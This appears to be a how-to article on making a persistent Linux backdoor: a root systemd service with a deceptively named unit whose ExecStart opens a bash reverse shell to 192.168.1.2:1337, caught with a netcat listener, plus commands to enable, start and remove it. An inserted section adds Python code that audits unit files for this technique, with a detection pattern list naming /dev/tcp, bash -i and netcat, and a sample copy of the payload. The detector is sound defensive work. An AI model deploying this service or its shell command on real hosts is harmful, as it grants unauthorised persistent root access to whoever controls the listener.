Some programs are nice to start every time the system boots. The use cases can vary from web services to persistent malware. Your imagination is the limitation.
In this article, I will show a simple method of creating a backdoor service that is managed by SystemD on a Linux host.
Reverse Shell Service
Persistent access to remote host
Do you ever find yourself in a situation where it would be nice to have persistent access to a remote host even after it reboots? Well, then a SystemD service is a simple means to that end.
To get this working you will need to have root-level permissions on the host.
Start off by creating a service definition file that you store somewhere on the system. In this example, we place it in the /tmp directory.
vim /tmp/root4you.service
[Unit]
Description=This is not the evil service you are looking for...
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/1337 0>&1'
[Install]
WantedBy=multi-user.target
This file will be used to add an entry to SystemD. To add the service to SystemD and enable it so that it runs at system startup, run this command:
systemctl enable /tmp/root4you.service
Once the service is added to SystemD, the file is no longer needed.
The service will start a reverse shell that tries to connect to the IP address 192.168.1.2 on port 1337. To receive the connection, the host with that IP address must have Netcat listening on the same port.
nc -nlvp 1337
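For the defensive side of the procedure above, here is an added example (my code, not part of the original article) that audits SystemD unit files for exactly the artefacts this technique leaves behind. Two things are worth knowing when hunting for it: `systemctl enable` given an absolute path first links the file into /etc/systemd/system as a symlink (the same thing `systemctl link` does) and then adds the `*.wants/` symlink, so the unit file keeps being read from its original location (/tmp here) and the enabled unit shows up as a symlink whose target lies outside the standard unit directories; and the ExecStart line itself carries tell-tale shell idioms such as `/dev/tcp/` and `bash -i`. The pattern list, the sample unit texts and the helper names (`parse_unit`, `audit_unit`, `audit_system_dir`) are my own constructions and assumptions, not anything from the article or from systemd.

```python
import os
import re
from pathlib import Path

# Directories systemd normally loads unit files from. A unit file living anywhere
# else (e.g. /tmp, /home, /var/tmp) deserves a closer look.
STANDARD_UNIT_DIRS = (
    "/etc/systemd/system",
    "/run/systemd/system",
    "/usr/local/lib/systemd/system",
    "/usr/lib/systemd/system",
    "/lib/systemd/system",
)

# ExecStart= patterns typical of shell-based reverse connections rather than a
# normal daemon. Constructed for this example; tune to your environment.
SUSPICIOUS_EXEC = (
    (re.compile(r"/dev/(tcp|udp)/"), "bash network redirection (/dev/tcp)"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash shell"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e"),
    (re.compile(r"\b(python|perl|php|ruby)\d?\b.*\bsocket\b"), "scripting-language socket one-liner"),
)


def parse_unit(text):
    """Minimal INI-style parser for a unit file: {section: {key: [values]}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def audit_unit(unit_path, text):
    """Return a list of human-readable findings for one unit file (empty = clean)."""
    findings = []
    path = str(Path(unit_path))
    if not any(path.startswith(d + "/") for d in STANDARD_UNIT_DIRS):
        findings.append(f"unit file outside standard unit directories: {path}")
    service = parse_unit(text).get("Service", {})
    exec_findings = []
    for cmd in service.get("ExecStart", []):
        for pattern, label in SUSPICIOUS_EXEC:
            if pattern.search(cmd):
                exec_findings.append(f"ExecStart matches {label}: {cmd}")
    findings.extend(exec_findings)
    # User= defaults to root when absent; only worth noting alongside an exec hit.
    if exec_findings and service.get("User", ["root"])[0] == "root":
        findings.append("suspicious ExecStart runs as root")
    return findings


def audit_system_dir(system_dir="/etc/systemd/system"):
    """Follow the symlinks `systemctl enable` creates under system_dir and audit each
    link target. Returns [(link, findings)] for dangling links or links with findings."""
    results = []
    base = Path(system_dir)
    if not base.is_dir():
        return results
    for link in list(base.glob("*.service")) + list(base.glob("*.wants/*.service")):
        if not link.is_symlink():
            continue
        target = os.readlink(link)  # raw link target, deliberately not resolved
        target_path = Path(target) if os.path.isabs(target) else link.parent / target
        if not target_path.exists():
            results.append((str(link), [f"dangling symlink to {target}"]))
            continue
        findings = audit_unit(str(target_path), target_path.read_text(errors="replace"))
        if findings:
            results.append((str(link), findings))
    return results


# Constructed sample unit files: the article's service next to a benign daemon unit.
SAMPLE_UNITS = {
    "/tmp/root4you.service": (
        "[Unit]\nDescription=This is not the evil service you are looking for...\n"
        "[Service]\nType=simple\nUser=root\n"
        "ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/1337 0>&1'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/usr/lib/systemd/system/nginx.service": (
        "[Unit]\nDescription=A high performance web server\n"
        "[Service]\nType=forking\nExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
}


def audit_samples():
    """Audit the constructed samples; returns {path: findings}."""
    return {path: audit_unit(path, text) for path, text in SAMPLE_UNITS.items()}


if __name__ == "__main__":
    for path, findings in audit_samples().items():
        print(path, "->", findings or "clean")
    for link, findings in audit_system_dir():  # live check of the local host
        print(link, "->", findings)
```

Run as root on a real host, `audit_system_dir()` walks the symlinks under /etc/systemd/system and reports any whose target sits outside the packaged unit directories or whose ExecStart matches the shell patterns; a dangling link (the unit file was deleted after enabling, or /tmp was cleared on reboot) is reported too, since it still records that something was enabled from an unusual location. Pair this with file-integrity monitoring on /etc/systemd/system and the `*.wants/` directories so a newly created symlink raises an alert at the moment `systemctl enable` runs.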
Manage service
Start, Stop and Status
Now this service can be managed just like any other SystemD managed service with these commands:
systemctl start root4you
systemctl stop root4you
systemctl status root4you
Since the service is enabled in SystemD, it will start the next time the host boots, but right now it is not running. To start the service and test that it works, you will need to start it manually.
Removal
Clean up the mess
To remove the service from SystemD, simply disable it:
systemctl disable root4you